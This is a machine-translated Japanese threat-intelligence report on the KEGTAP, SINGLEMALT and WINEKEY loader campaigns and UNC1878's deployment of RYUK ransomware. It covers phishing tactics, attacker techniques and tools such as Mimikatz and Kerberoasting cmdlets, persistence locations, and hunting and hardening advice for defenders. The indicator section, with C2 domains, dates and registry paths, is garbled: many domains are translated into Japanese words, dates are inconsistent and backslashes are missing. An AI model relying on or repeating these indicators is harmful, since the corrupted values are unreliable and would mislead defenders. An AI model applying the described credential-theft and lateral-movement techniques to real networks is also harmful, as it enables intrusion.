2020 年を通じて、 ランサムウェアの活動はますます活発化しており、恐喝を行う前に目的のターゲットにアクセスするための、別個でありながら相互に有効化する操作のエコシステムに依存しています。 Mandiant Threat Intelligence は、ランサムウェアの侵害後の展開につながるいくつかのローダーおよびバックドア キャンペーンを追跡してきました。これらのキャンペーンを効果的かつ迅速に検出することが、この脅威を軽減するための鍵となります。
Mandiant がインテリジェンス サブスクライバーに以前に報告したこれらの攻撃を可能にするマルウェア ファミリには、KEGTAP/BEERBOT、SINGLEMALT/STILLBOT、および WINEKEY/CORKBOT が含まれます。これらのマルウェア ファミリは、同じコマンド アンド コントロール インフラストラクチャ (C2) と通信し、ほぼ同等の機能を備えていますが、コードの重複は最小限に抑えられています。他のセキュリティ研究者は、これらのマルウェア ファミリを BazarLoader およびBazarBackdoorまたはTeam9という名前で追跡しています。
これらのキャンペーンを実施しているオペレーターは、世界的な健康危機の最中であっても、病院、退職者コミュニティ、および医療センターを積極的に標的にしており、人命を明らかに軽視していることを示しています.
メール キャンペーンの TTP
KEGTAP、SINGLEMALT、および WINEKEY を配布するキャンペーンは、さまざまな配信戦術、技術、手順 (TTP) を使用して、さまざまな業界や地域の組織の個人に送信されています。これらのキャンペーンでは頻繁に変化が見られますが、最近の活動では以下の点が一貫しています。
- 電子メールには、攻撃者が制御する Google ドキュメント ドキュメント (通常は PDF ファイル) へのインライン リンクが含まれています。
- このドキュメントには、マルウェア ペイロードをホストする URL へのインライン リンクが含まれています。
- 電子メールは、苦情、解雇、賞与、契約、勤務スケジュール、調査、または営業時間に関する問い合わせに関連するように細工された文書や電話、または電子メールに関するフォローアップを含む、一般的な企業通信を装います。
- 一部の電子メール通信では、件名や電子メール本文に受信者の名前または雇用主の名前が含まれています。
この均一性にもかかわらず、関連する TTP は、キャンペーン間および同じ日に確認された複数のスパム実行間で定期的に変更されています。これらのキャンペーンが時間の経過とともに変化した注目すべき方法は次のとおりです。
- 初期のキャンペーンは Sendgrid 経由で配信され、攻撃者が作成した Google ドキュメントにユーザーをリダイレクトする Sendgrid URL へのインライン リンクが含まれていました。対照的に、最近のキャンペーンは、攻撃者が制御した、または侵害された電子メール インフラストラクチャを介して配信されており、攻撃者が作成した Google ドキュメントへのインライン リンクが一般的に含まれていますが、Constant Contact サービスに関連付けられたリンクも使用されています。
- これらのインライン リンクによって読み込まれるドキュメントは、電子メール キャンペーンのテーマにある程度関連するように細工されており、追加のリンクと、ユーザーがクリックするように指示する指示が含まれています。これらのリンクをクリックすると、ファイル名がドキュメント ファイルになりすましたマルウェア バイナリがダウンロードされます。以前のキャンペーンでは、これらのマルウェア バイナリは侵害されたインフラストラクチャでホストされていましたが、攻撃者は、Google ドライブ、Basecamp、Slack、Trello、Yougile、JetBrains などの正規の Web サービスでマルウェアをホストするようになりました。
- 最近のキャンペーンでは、マルウェア ペイロードは、これらの正当なサービスの 1 つまたは複数に関連付けられた多数の URL でホストされています。ペイロードが削除された場合、攻撃者は Google ドキュメントを更新して、新しい有効なリンクを含めることがあります。
- 一部のキャンペーンには、受信者の組織への内部参照を含む電子メール (図 1) や、Google ドキュメント ドキュメントに埋め込まれた組織のロゴ (図 2) など、カスタマイズが組み込まれています。
最終的なペイロードを複数のリンクの背後に隠すことは、一部の電子メール フィルタリング テクノロジを回避するための簡単で効果的な方法です。さまざまなテクノロジには、メール内のリンクをたどってマルウェアや悪意のあるドメインを特定しようとする機能があります。ただし、たどるリンクの数はさまざまです。さらに、PDF ドキュメント内にリンクを埋め込むと、自動検出とリンク追跡がさらに困難になります。
侵害後の TTP
これらのキャンペーンから得られたアクセスがさまざまなオペレーターに提供されて収益化される可能性があることを考えると、展開されたランサムウェア ファミリを含む後期の TTP は、侵入ごとに異なる可能性があります。 Mandiant がこれらの侵害後の TTP を可視化した大部分のケースは、RYUK ランサムウェアの展開を介してネットワーク アクセスを収益化する金銭目的の攻撃者である UNC1878 によるものです。
足場を固める
最初の被害者ホストでローダーとバックドアが実行されると、攻撃者はこの最初のバックドアを使用して POWERTRICK および/または Cobalt Strike BEACON ペイロードをダウンロードし、足がかりを確立します。特に、それぞれのローダーとバックドア、および POWERTRICK は、通常、観察されたインシデントで少数のホストにインストールされており、これらのペイロードが足場を確立し、最初のネットワークとホストの偵察を実行するために予約されている可能性があることを示唆しています。ただし、BEACON は多数のホストで頻繁に検出され、攻撃ライフサイクルのさまざまな段階で使用されます。
プレゼンスを維持する
各侵入の予備段階を超えて、これらの攻撃者が最初の足場を確立した後、またはネットワーク内で横方向に移動した後、どのように存在を維持しているかに変化が見られました。 Cobalt Strike、Metasploit、EMPIRE などの一般的なエクスプロイト後のフレームワークの使用に加えて、TrickBot の背後にいるアクターの制御下にあると考えられる ANCHOR などの他のバックドアの使用も確認しています。
- このアクティビティに関連付けられたローダーは、スケジュールされたタスクの作成、スタートアップ フォルダーへのショートカットとしての自身の追加、/setnotifycmdline を使用したスケジュールされた Microsoft BITS ジョブの作成、および次のレジストリ キーの下の Userinit 値:
- HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon.
- 攻撃者は、最初の侵害に続いて、POWERTRICK、Metasploit Meterpreter、および Cobalt Strike BEACON ペイロードをダウンロードしました。 BEACON ペイロードは通常、被害者のネットワーク内の新しいホストに横方向に移動した後に実行されます。攻撃者は、被害者の環境の重要なシステムでスケジュールされたタスクを介して再起動することで永続性を維持するように細工された Cobalt Strike ペイロードを採用しています。特に、BEACON は、これらのインシデントで最も頻繁に観察されたバックドアです。
- 攻撃者がエンコードされた PowerShell コマンドを実行し、最終的に PowerShell EMPIRE バックドアのインスタンスを実行したことを確認しました。
- 攻撃者は、BEACON を使用してPowerLurk のRegister-MaliciousWmiEvent コマンドレットを実行し、タスク マネージャー、WireShark、TCPView、ProcDump、Process Explorer、Process Monitor、NetStat、PSLoggedOn、LogonSessions などのセキュリティ ツールおよびユーティリティに関連するプロセスを強制終了するために使用される WMI イベントを登録することが観察されました。 Process Hacker、Autoruns、AutorunsSC、RegEdit、および RegShot。
- 少なくとも 1 回は、攻撃者が盗んだ認証情報を使用して被害者の環境へのアクセスを維持し、単一要素認証のみを要求するように構成された企業の VPN インフラストラクチャにアクセスしました。
権限の昇格
これらのインシデントで権限をエスカレートする最も一般的な方法には、有効な資格情報の使用が含まれていました。攻撃者は、さまざまな手法を使用して、メモリまたはディスクに保存されている資格情報にアクセスし、特権アカウントにアクセスしました。
- 攻撃者は、MimiKatz の亜種を使用して取得した有効な認証情報を使用して、権限を昇格させました。私たちは、Mimikatz が被害ホストのファイル システムから実行されることと、Cobalt Strike BEACON を介して実行される PowerShell コマンドレットを介して実行されることを確認しました。
- 攻撃者は、ドメイン コントローラーからntds.dit Active Directory データベースと SYSTEM および SECURITY レジストリ ハイブのエクスポートされたコピーを介して資格情報にアクセスできます。
- 複数のインスタンスで、攻撃者は RUBEUS、MimiKatz Kerberos モジュール、および Invoke-Kerberoast コマンドレットの使用を含む、Kerberos に対する攻撃を開始しました。
偵察
これらのインシデント全体でホストとネットワークの偵察を実行するために採用されたアプローチはさまざまでした。ただし、観察された偵察活動の大部分は、BLOODHOUND、SHARPHOUND、ADFind などの公開ユーティリティを使用したアクティビティ ディレクトリの列挙と、Cobalt Strike BEACON を使用した PowerShell コマンドレットの実行を中心に展開されています。
- BEACON は、これらの侵入全体で多数のシステムにインストールされており、組み込みのホスト コマンドと PowerShell コマンドレットの両方を含むさまざまな偵察コマンドを実行するために使用されています。観測された PowerShell コマンドレットには、次のものが含まれます。
- 取得-GPPPassword
- Invoke-AllChecks
- Invoke-BloodHound
- Invoke-EternalBlue
- Invoke-FileFinder
- Invoke-HostRecon
- Invoke-Inveigh
- Invoke-Kerberoast
- Invoke-LoginPrompt
- 呼び出し-mimikittenz
- Invoke-ShareFinder
- Invoke-UserHunter
- Mandiant は、攻撃者が POWERTRICK を使用して、最初の被害者ホストで組み込みのシステム コマンド ( ipconfig 、 findstr 、およびcmd.exe など) を実行することを観察しました。
- 攻撃者は、公開されているユーティリティ Adfind、BLOODHOUND、SHARPHOUND、および KERBRUTE を被害者のネットワークで利用して、Active Directory の情報と資格情報を収集しました。
- WMIC コマンドは、インストールされているソフトウェアの一覧表示、実行中のプロセスの一覧表示、オペレーティング システムとシステム アーキテクチャの識別など、ホストの偵察を実行するために使用されています。
- 攻撃者はバッチ スクリプトを使用して、Active Directory の列挙中に特定されたすべてのサーバーに ping を実行し、結果をres.txtに出力しました。
- 攻撃者は、 Nltestコマンドを使用してドメイン コントローラを一覧表示しました。
横移動
ラテラル ムーブメントは、有効な資格情報を Cobalt Strike BEACON、RDP、および SMB と組み合わせて使用するか、被害者のネットワークに足場を築くために使用されたのと同じバックドアを使用して行われることが最も一般的でした。
- 攻撃者は定期的に Cobalt Strike BEACON と Metasploit Meterpreter を利用して、被害者の環境内を横方向に移動しています。
- 攻撃者は通常、侵害されたアカウント (通常のユーザーに属するアカウントと管理者権限を持つアカウントの両方) を使用して、被害者の環境内を横方向に移動しました。一般的なポストエクスプロイト フレームワークの使用に加えて、WMIC コマンドと Windows RDP および SMB プロトコルを使用してラテラル ムーブメントも実現されています。
- 攻撃者は、Windows のnet useコマンドを使用して Windows 管理共有に接続し、横方向に移動しました。
ミッションを完了する
Mandiant は、侵害後の RYUK ランサムウェアの展開を含む、KEGTAP に関連するインシデントを直接認識しています。また、同じアクターに関連付けられた別のバックドアである ANCHOR 感染が、CONTI または MAZE の展開に先立って発生した事例も観察されています。
- 少なくとも 1 つのケースで、SFTP を介して攻撃者が制御するサーバーにファイルを流出させるように設計された実行可能ファイルが確認されました。
- 攻撃者は Cobalt Strike BEACON を使用して、ネットワーク偵察活動を通じて作成されたデータとユーザー ファイルを盗み出しました。
- 攻撃者は、侵害の痕跡を取り除こうとして、被害者のホストからツールを削除しているのが観察されました。
- 攻撃者は、被害者のネットワークへのアクセスを利用して、ランサムウェア ペイロードを展開しました。 RYUK ランサムウェアが PsExec を介して展開された可能性が高いことを示唆する証拠がありますが、配布プロセスに関連する他のスクリプトやアーティファクトはフォレンジック分析に利用できませんでした。
狩猟戦略
組織が、KEGTAP または類似のマルウェア ファミリのインスタンスであると考えられるアクティブな感染を持つホストを特定した場合、次の封じ込め措置が推奨されます。この侵入活動は速度が速いため、これらのアクションは並行して実行する必要があることに注意してください。
- 影響を受けるシステムを特定してフォレンジック レビューを実行します。
- 影響を受けるデバイスを所有するユーザーへの受信メールを確認して、配布キャンペーンに一致するメールを確認し、すべてのメールボックスからメッセージを削除するための措置を講じます。
- フィッシング キャンペーンで使用された URL を特定し、プロキシまたはネットワーク セキュリティ デバイスを使用してそれらをブロックします。
- マルウェアの実行に関連するすべてのユーザー アカウントの資格情報をリセットします。
- 影響を受けるシステムからのラテラル ムーブメント認証について、企業全体のレビューを実行します。
- 存在する可能性のある単一要素のリモート アクセス ソリューション (VPN、VDI など) からの認証ログを確認し、できるだけ早く多要素認証 (MFA) に移行します。
第 1 段階のマルウェアの実行に関連するホストベースのアーティファクトと、このアクティビティに関連するすべての侵入後のアクティビティを特定するために、企業全体の取り組みを行う必要があります。これに対するいくつかのベースライン アプローチは、次のように取り込まれています。
KEGTAP ローダーに関連するアクティビティは、多くの場合、HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon レジストリ キーの下にあるシステム スタートアップ フォルダーと Userinit 値を確認することで特定できます。
%APPDATA%MicrosoftWindowsStart MenuProgramsStartupadobe.lnk |
図 3: システムのスタートアップ フォルダー内の KEGTAP 永続性に関連付けられた LNK ファイルの例
SINGLEMALT は、BITS を使用して再起動後も永続性を維持します。多くの場合、異常な BITS ジョブを確認することで特定できます。 SINGLEMALT は、存在しない URL をダウンロードするジョブを意図的に作成する、十分に文書化された BITS 永続化メカニズムを使用します。これにより、障害イベントがトリガーされます。ジョブは一定の間隔で再試行するように設定されているため、マルウェアは引き続き実行されます。ホストで BITS ジョブを確認するには、コマンドbitsadmin /listを実行します。
- 表示名は、「Adobe Update」、「System autoupdate」、またはその他の一般的な値です。
- 通知状態が失敗 (ステータス 2) に設定されている可能性があります。
- FileList URL 値が、ローカル ホストまたは存在しない URL に設定されている可能性があります。
- Notification Command Line の値には、SINGLEMALT サンプルへのパスや、サンプルを新しい場所に移動してから開始するコマンドが含まれている場合があります。
- Retry Delay の値が設定されます。
WINEKEY は、レジストリの RUN キーを使用して再起動しても持続性を維持します。企業全体で異常な RUN キーを検索すると、このマルウェアの影響を受けるシステムを特定するのに役立ちます。
キー: HKCUSoftwareMicrosoftWindowsCurrentVersionRunBackup Mgr 値: バックドアへのパス |
図 4: WINEKEY が永続性を維持するために使用するレジストリ RUN キーの例
ANCHOR バックドアは、このアクティビティに関連する侵入のサブセットで確認されており、多くの場合、再起動による持続性を維持するために使用するスケジュールされたタスクを介して特定できます。 ANCHOR によって作成されたスケジュールされたタスクは、多くの場合、名前が付けられていませんが、常にそうであるとは限りません。
- ANCHOR 永続性に関連付けられた名前付きのスケジュールされたタスクの識別は、次のパターンに従って構築できます。
- 名前のないスケジュールされたすべてのタスク、特に作成日が侵害の疑いのある時間と一致するタスクを確認する必要があります。
これは忠実度の低い指標ですが、ANCHOR アクティビティは、次のパターンに一致するファイル名を持つ C:WindowsSysWOW64 ディレクトリ内のバイナリを検索することによって特定される場合もあります: < 8 個のランダムな小文字>.exe。 C:WindowsSysWOW64 ディレクトリ内のファイル作成タイムスタンプを積み重ねたり並べ替えたりすることも、悪意のあるファイルを特定するのに役立つ場合があります。これは、ディレクトリがほとんど静的であるためです。
これらのキャンペーンに続くランサムウェアの展開に関連するエクスプロイト後の活動は、通常、Cobalt Strike 攻撃フレームワークを使用して行われます。 Cobalt Strike に関連付けられた BEACON ペイロードは、多くの場合、既存の登録済みサービスとサービス作成イベント (イベント ID 7045) を確認することで識別できます。これらは両方とも、永続性を維持するために最も一般的に採用されているメカニズムのマーカーです。
以下は、関連する活動を特定するのに役立つ可能性がある追加の戦略です。
- 組織は、Web プロキシ ログを確認して、Google ドキュメント ドキュメントからのリファラーを使用して、ファイル ストレージ、プロジェクト管理、コラボレーション、または通信サービスに対する HXXP 要求を特定できます。
- 関連する侵害後の活動中に、攻撃者は通常、ツールとデータを PerfLogs ディレクトリと C$ 共有にステージングしました。
- 後の段階の操作を可能にするために使用されるデータを収集している間、攻撃者は通常、影響を受けるシステムに ntds.dit のインスタンスと、SYSTEM および SECURITY レジストリ ハイブのエクスポートを残します。
強化戦略
アクターが権限をエスカレートし、環境内を横方向に移動するために実行するアクションは、十分に文書化された手法を使用して、ネットワークと Active Directory を検索し、資格情報とシステムを悪用のために公開する一般的な構成ミスを探します。組織は、これらの手法の影響と有効性を制限するための措置を講じることができます。詳細な推奨事項については、 ランサムウェア保護に関するホワイト ペーパーを参照してください。
- ブルート フォース攻撃やパスワード推測攻撃に対してサービス アカウントを強化します。ほとんどの組織には、パスワードが無期限に設定されたサービス アカウントが少なくともいくつかあります。これらのパスワードはおそらく古く、安全ではありません。できるだけ多くのアカウントを長くて複雑なパスワードにリセットするよう最善を尽くしてください。可能であれば、自動ローテーションのために MSA および gMSAS に移行します。
- ラテラル ムーブメントに特権アカウントを使用しないようにします。 GPO を使用して、ドメイン管理者や特権サービス アカウントなどの特権アカウントが RDP 接続とネットワーク ログインを開始できないように制限します。潜在的なアカウントの数を制限することで、検出の機会と攻撃者を遅らせる機会を提供します。
- 可能な場合、サーバーのインターネット アクセスをブロックします。多くの場合、サーバー、特に AD インフラストラクチャ システムがインターネットにアクセスするビジネス ニーズはありません。攻撃者は、BEACON などのエクスプロイト後のツールを展開するために、アップタイムの高いサーバーを選択することがよくあります。
- Web プロキシまたは DNS フィルターを使用して、未分類の新規登録ドメインをブロックします。多くの場合、フィッシングによって配信される最終的なペイロードは、ビジネスの分類を持たない侵害されたサードパーティの Web サイトでホストされます。
- 重要なパッチが Windows システムとネットワーク インフラストラクチャにインストールされていることを確認します。攻撃者が、Zerologon (CVE-2020-1472) などのよく知られた脆弱性を悪用して、ランサムウェアを展開する前に環境内の権限をエスカレートすることを確認しています。 UNC1878 とは無関係の可能性がある他のケースでは、攻撃者がランサムウェアを展開する前に、脆弱な VPN インフラストラクチャを介して環境にアクセスすることを確認しています。
ランサムウェアやその他の脅威に関するインテリジェンスの詳細については、当社の脅威インテリジェンス プラットフォームの無料バージョンであるMandiant Advantage Freeに登録してください。この脅威に関する追加情報については、State of the Hack のこのエピソードをご覧ください。
キャンペーン指標
サンプルメールの件名/パターン
- <(first|last)-name>: 重要な情報
- <会社名>
- <会社名> の苦情
- <(名|姓)-名前>
- <(名|姓)-名前>
- 契約解除メッセージ
- 契約解除のお知らせ
- 契約解除通知
- 契約解除のリマインダー
- 契約停止メッセージ
- 契約停止のお知らせ
- 契約停止のお知らせ
- 契約一時停止のリマインダー
- 手配キャンセルメッセージ
- 手配中止のお知らせ
- 手配キャンセル通知
- 手配キャンセルのリマインダー
- 手配停止メッセージ
- 手配休止のお知らせ
- 手配停止届
- 手配中止のお知らせ
- 契約解除メッセージ
- 契約解除のお知らせ
- 契約解除届
- 契約解除のリマインダー
- 契約停止メッセージ
- 契約停止のお知らせ
- 契約停止届
- 契約停止のリマインダー
- 引き落とし確認
- FW: <名前> 年次ボーナス レポートの準備ができました
- FW: 緊急: <会社名>: 顧客からの苦情依頼 – 迅速な対応が必要
- RE: <(名|姓)-名前>
- RE: <(first|last)-name>: 10 月の給与明細
- RE: <会社名> – 私の訪問
- RE: <会社名> 従業員アンケート
- RE: <会社名> オフィス
- RE: <Name> さんの苦情について
- RE: <名前> ボーナス
- RE: <名前> 終了リスト
- RE: <名前>
- RE: <会社名> オフィス
- RE: <(名|姓)-名前>
- RE: <(first|last)-name> <(first|last)-name>: 苦情
- RE: <(first|last)-name>: 召喚状
- RE: <(名|姓)-名前>
- RE: <(first|last)-name>: 9 月の給与明細
- RE: 苦情について
- RE: 採用されたファイラー フォーム
- RE: 営業時間の調整
- RE: 営業時間変更のお知らせ
- RE: 営業時間変更のお知らせ
- RE: 営業時間変更のお知らせ
- RE: 営業日程調整
- RE: 営業日程調整のお知らせ
- RE: 営業日程変更のお知らせ
- RE: 事業スケジュールの再構築
- RE: 電話して
- RE: 変更
- RE: 苦情
- RE: <会社名> の苦情。
- RE: <名前> に関する苦情
- RE: お客様のリクエスト
- RE: 引き落とし確認
- RE: ドキュメントのコピー
- RE: ドキュメント一覧
- RE: エドガー ファイラー フォーム リノベーション
- RE: 従業員のボーナス
- RE: Filer Forms の適応
- RE: 私の電話
- RE: 新しいファイラー フォーム タイプ
- RE: オフィス
- RE: 私たちの出会い
- RE: 給与台帳
- RE: レポートの確認
- RE: 状況
- RE: 召喚状
- RE: 終了
- RE: 午後2時まで
- RE: 緊急の <会社名> 従業員の社内調査
- RE: 訪問
- RE: ご意見は?
- RE: 何時ですか?
- RE: なぜ
- RE: なぜこのデビット
- RE: 勤務スケジュール調整
- RE: 勤務スケジュールの再調整
- RE: 勤務スケジュールの再調整
- RE: 勤務スケジュールの再構築
- RE: 9 月の給与明細
マルウェア ファミリ MD5 の例
- KEGTAP
- df00d1192451268c31c1f8568d1ff472
- ビアボット
- 6c6a2bfa5846fab374b2b97e65095ec9
- シングルモルト
- 37aa5690094cb6d638d0f13851be4246
- スティルボット
- 3176c4a2755ae00f4fffe079608c7b25
- ワインキー
- 9301564bdd572b0773f105287d8837c4
- コルクボット
- 0796f1c1ea0a142fc1eb7109a44c86cb
コード署名証明書の CN
- ARTBUD ラドム SP ZOO
- BESPOKE SOFTWARE SOLUTIONS LIMITED
- ベスト ファッド、OOO
- ブルーマーブル社
- チューFSP、LLC
- 会社 メガコム SP ZOO
- エステラ、オー
- エクソンレンタルSP ZOO
- 月山合同会社
- GLOBAL PARK HORIZON SP ZOO
- 無限プログラミング限定
- ジェームズ LTH ドゥー
- ロジカ OOO
- マダスドゥー
- マスタープラス SP ZOO
- ニードコード SP ZOO
- ノードコッド LLC
- NOSOV SP ZOO
- OOO MEP
- 株式会社プラン
- 地域観光LLC
- RESURS-RM OOO
- リタリット LLC
- ルミコン合同会社
- SNAB-RESURS、OOO
- タラットドゥー
- テス ロジスティカ ドゥー
- ヴァス株式会社
- VB コーポレート PTY。株式会社。
- VITA-DEドゥー
UNC1878 インジケーター
これらのキャンペーンに関連する侵害後の活動の大部分は、Mandiant が UNC1878 として追跡している脅威グループによる RYUK ランサムウェアの配布に関係しています。そのため、このグループに関連する指標をリリースしています。
ビーコン C2
初見 |
ドメイン |
12/11/19 |
updatemanager[.]us |
12/20/19 |
cmdupdatewin[.]com |
12/26/19 |
scrservallinst[.]情報 |
2020/1/10 |
winsystemupdate[.]com |
1/11/20 |
ジョマンバ[.]ベスト |
2020/1/13 |
updatewinlsass[.]com |
2020/1/16 |
winsysteminfo[.]com |
2020/1/20 |
livecheckpointsrs[.]com |
2020/1/21 |
ciscocheckapi[.]com |
2020/1/28 |
タイムシフト[.]com |
2020/1/29 |
サイレンスプロテクト[.]com |
2020/1/30 |
sophosdefence[.]com |
2020/1/30 |
タスクスケジュールwin[.]com |
2020/1/30 |
winddefenceinfo[.]com |
2020/1/30 |
lsasswininfo[.]com |
2020/1/30 |
update-wind[.]com |
2020/1/30 |
lsassupdate[.]com |
2020/1/30 |
renovatesystem[.]com |
2020/1/31 |
updatewinsoftr[.]com |
2020/2/2 |
cleardefencewin[.]com |
2020/2/2 |
checkwinupdate[.]com |
2020/2/2 |
havesetup[.]net |
2020/2/3 |
update-wins[.]com |
2020/2/3 |
conhostservice[.]com |
2020/2/4 |
microsoftupdateswin[.]com |
2020/2/4 |
iexploreservice[.]com |
2020/2/12 |
avrenew[.]com |
2020/2/12 |
ターゲット サポート[.]オンライン |
2020/2/12 |
ウェブ分析[.]ライブ |
2020/2/14 |
freeallsafe[.]com |
2020/2/17 |
windefens[.]com |
2020/2/17 |
defenswin[.]com |
2020/2/17 |
easytus[.]com |
2020/2/17 |
グレートタス[.]com |
2020/2/17 |
livetus[.]com |
2020/2/17 |
comssite[.]com |
2020/2/17 |
findtus[.]com |
2020/2/17 |
bigtus[.]com |
2020/2/17 |
aatus[.]com |
2020/2/17 |
besttus[.]com |
2020/2/17 |
firsttus[.]com |
2020/2/17 |
worldtus[.]com |
2020/2/26 |
freeoldsafe[.]com |
2020/2/26 |
サービスアップデート[.]ネット |
2020/2/26 |
topserviceupdater[.]com |
2020/2/27 |
myserviceupdater[.]com |
2020/2/29 |
myservicebooster[.]net |
2020/2/29 |
servicesbooster[.]org |
2020/2/29 |
ブレインシャンピオン[.]com |
2020/2/29 |
myservicebooster[.]com |
2020/2/29 |
topservicesbooster[.]com |
2020/2/29 |
servicesbooster[.]com |
2020/2/29 |
topservicesecurity[.]org |
2020/2/29 |
トップサービスセキュリティ[.]ネット |
2020/2/29 |
topsecurityservice[.]net |
2020/2/29 |
myyserviceupdater[.]com |
2020/2/29 |
topservicesupdate[.]com |
2020/2/29 |
topservicesecurity[.]com |
2020/2/29 |
サービスセキュリティ[.]組織 |
2020/2/29 |
myserviceconnect[.]net |
2020/3/2 |
topservicesupdates[.]com |
2020/3/2 |
yoursuperservice[.]com |
2020/3/2 |
topservicehelper[.]com |
2020/3/2 |
serviceuphelper[.]com |
2020/3/2 |
serviceshelpers[.]com |
2020/3/2 |
ブーストセキュリティ[.]com |
2020/3/3 |
彼は私を悩ませなかった[.]com |
2020/3/8 |
サービスアップデーター[.]com |
2020/3/9 |
secondserviceupdater[.]com |
2020/3/9 |
12thserviceupdater[.]com |
2020/3/9 |
20thservicehelper[.]com |
2020/3/9 |
twelfthservicehelper[.]com |
2020/3/9 |
tenthservicehelper[.]com |
2020/3/9 |
thirdserviceupdater[.]com |
2020/3/9 |
thirdservicehelper[.]com |
2020/3/9 |
tenthserviceupdater[.]com |
2020/3/9 |
13thservicehelper[.]com |
2020/3/9 |
Seventeenthservicehelper[.]com |
2020/3/9 |
sixteenthservicehelper[.]com |
2020/3/9 |
sixservicehelper[.]com |
2020/3/9 |
セブンスサービスヘルパー[.]com |
2020/3/9 |
セブンスサービスアップデーター[.]com |
2020/3/9 |
sixserviceupdater[.]com |
2020/3/9 |
secondservicehelper[.]com |
2020/3/9 |
ninthservicehelper[.]com |
2020/3/9 |
ninethserviceupdater[.]com |
2020/3/9 |
fourteenthservicehelper[.]com |
2020/3/9 |
fourserviceupdater[.]com |
2020/3/9 |
firstserviceupdater[.]com |
2020/3/9 |
firstservicehelper[.]com |
2020/3/9 |
フィフスサービスアップデーター[.]com |
2020/3/9 |
11thserviceupdater[.]com |
2020/3/9 |
5番目のサービスヘルパー[.]com |
2020/3/9 |
fourservicehelper[.]com |
2020/3/9 |
8thservicehelper[.]com |
2020/3/9 |
18thservicehelper[.]com |
2020/3/9 |
8thserviceupdater[.]com |
2020/3/9 |
fifteenthservicehelper[.]com |
2020/3/9 |
19thservicehelper[.]com |
2020/3/9 |
11thservicehelper[.]com |
2020/3/14 |
thirdservice-developer[.]com |
2020/3/14 |
5番目のサービス開発者[.]com |
2020/3/15 |
firstservice-developer[.]com |
2020/3/16 |
fourservice-developer[.]com |
2020/3/16 |
ninethservice-developer[.]com |
2020/3/16 |
Seventhservice-developer[.]com |
2020/3/16 |
secondservice-developer[.]com |
2020/3/16 |
sixservice-developer[.]com |
2020/3/16 |
tenthservice-developer[.]com |
2020/3/16 |
eithtservice-developer[.]com |
2020/3/17 |
servicedupdater[.]com |
2020/3/17 |
サービスアップデータ[.]com |
2020/3/19 |
セクシーサービス[.]com |
2020/3/19 |
serviceboostnumberone[.]com |
2020/3/19 |
servicedbooster[.]com |
2020/3/19 |
サービスハンター[.]com |
2020/3/19 |
servicedhunter[.]com |
2020/3/19 |
servicedpower[.]com |
2020/3/19 |
sexycservice[.]com |
2020/3/23 |
yourserviceupdater[.]com |
2020/3/23 |
top-serviceupdater[.]com |
2020/3/23 |
トップサービスブースター[.]com |
2020/3/23 |
serviceshelps[.]com |
2020/3/23 |
servicemonsterr[.]com |
2020/3/23 |
servicehunterr[.]com |
2020/3/23 |
service-helpes[.]com |
2020/3/23 |
servicecheckerr[.]com |
2020/3/23 |
newservicehelper [.] com |
2020/3/23 |
ハンターサービス[.]com |
2020/3/23 |
helpforyourservice[.]com |
2020/3/23 |
boostyourservice[.]com |
2020/3/26 |
開発マスターズ[.]com |
2020/3/26 |
アクションハンター[.]com |
2020/5/4 |
info-develop[.]com |
2020/4/5 |
ayechecker[.]com |
2020/5/4 |
サービスブースター[.]com |
2020/9/18 |
行[.]com |
2020/9/22 |
gtrsqer[.]com |
2020/9/22 |
挑戦[.]com |
2020/9/22 |
chaonymes[.]com |
2020/9/22 |
noman[.]com |
2020/9/22 |
getinformationss[.]com |
2020/9/22 |
nomadfunclub[.]com |
2020/9/22 |
harddagger[.]com |
2020/9/22 |
errvghu[.]com |
2020/9/22 |
regins[.]com |
2020/9/22 |
gameleader[.]com |
2020/9/22 |
カミソリ[.]com |
2020/9/22 |
vnuret[.]com |
2020/9/22 |
regbed[.]com |
2020/9/22 |
ブース[.]com |
2020/9/23 |
ayiyas[.]com |
2020/9/23 |
サービスワーク[.]ネット |
2020/9/23 |
moonshardd[.]com |
2020/9/23 |
ラッシュポッター[.]com |
2020/9/23 |
biliyilish[.]com |
2020/9/23 |
ブラックホール[.]com |
2020/9/23 |
checkhunterr[.]com |
2020/9/23 |
ダガークリップ[.]com |
2020/9/23 |
check4list[.]com |
2020 年 9 月 24 日 |
トーク[.]コム |
2020/9/29 |
ハングリーベイビー[.]com |
2020/9/30 |
marahzz[.]com |
10/1/20 |
josonsbabyy[.]com |
10/1/20 |
wondergodst[.]com |
2020/1/10 |
zetrex[.]com |
2020/1/10 |
tiancaii[.]com |
2020/1/10 |
cantliee[.]com |
10/1/20 |
リアルゲームス[.]com |
2020/1/10 |
多分ベイビー[.]com |
10/1/20 |
saynoforbubble[.]com |
10/1/20 |
チェキングキング[.]コム |
2020/1/10 |
ラピラサ[.]com |
2020/1/10 |
レイドボッサ[.]com |
10/1/20 |
mountasd[.]com |
10/1/20 |
puckhunterrr[.]com |
2020/1/10 |
pudgee[.]com |
10/1/20 |
lockfinderrs[.]com |
2020/1/10 |
リンダック[.]com |
10/1/20 |
bithunterr[.]com |
2020/1/10 |
voiddas[.]com |
2020/1/10 |
シバルサキエ[.]com |
10/1/20 |
Giveasees[.]com |
10/1/20 |
shabihere[.]com |
10/1/20 |
tarhungangster[.]com |
2020/1/10 |
imagodd[.]com |
10/1/20 |
raaidboss[.]com |
10/1/20 |
sunofgodd[.]com |
2020/1/10 |
rulemonster[.]com |
2020/1/10 |
loxliver[.]com |
10/1/20 |
servicegungster[.]com |
10/1/20 |
kungfupandasa[.]com |
2020/2/10 |
check1domains[.]com |
2020/10/5 |
sweetmonsterr[.]com |
5/10/20 |
qascker[.]com |
10/7/20 |
リモート[.]com |
10/7/20 |
チープショット[.]com |
2020/7/10 |
havemosts[.]com |
2020/7/10 |
unlockwsa[.]com |
2020/7/10 |
アンダーケース[.]com |
10/7/20 |
zameharden[.]com |
2020/7/10 |
mixunderax[.]com |
10/7/20 |
bugsbunnyy[.]com |
10/7/20 |
fastbloodhunter[.]com |
10/7/20 |
serviceboosterr[.]com |
10/7/20 |
servicewikii[.]com |
10/7/20 |
secondlive[.]com |
10/7/20 |
quwasd[.]com |
10/7/20 |
ラッキーハンター[.]com |
2020/7/10 |
wodemaya[.]com |
10/7/20 |
hybriqdjs[.]com |
2020/7/10 |
ガンドラッグ[.]com |
10/7/20 |
ガンガメオン[.]com |
10/7/20 |
servicemount[.]com |
10/7/20 |
servicesupdater[.]com |
10/7/20 |
service-boosterr[.]com |
10/7/20 |
serviceupdate[.]com |
2020/7/10 |
dotmaingame[.]com |
10/12/20 |
backup1service[.]com |
10/13/20 |
bakcup-monster[.]com |
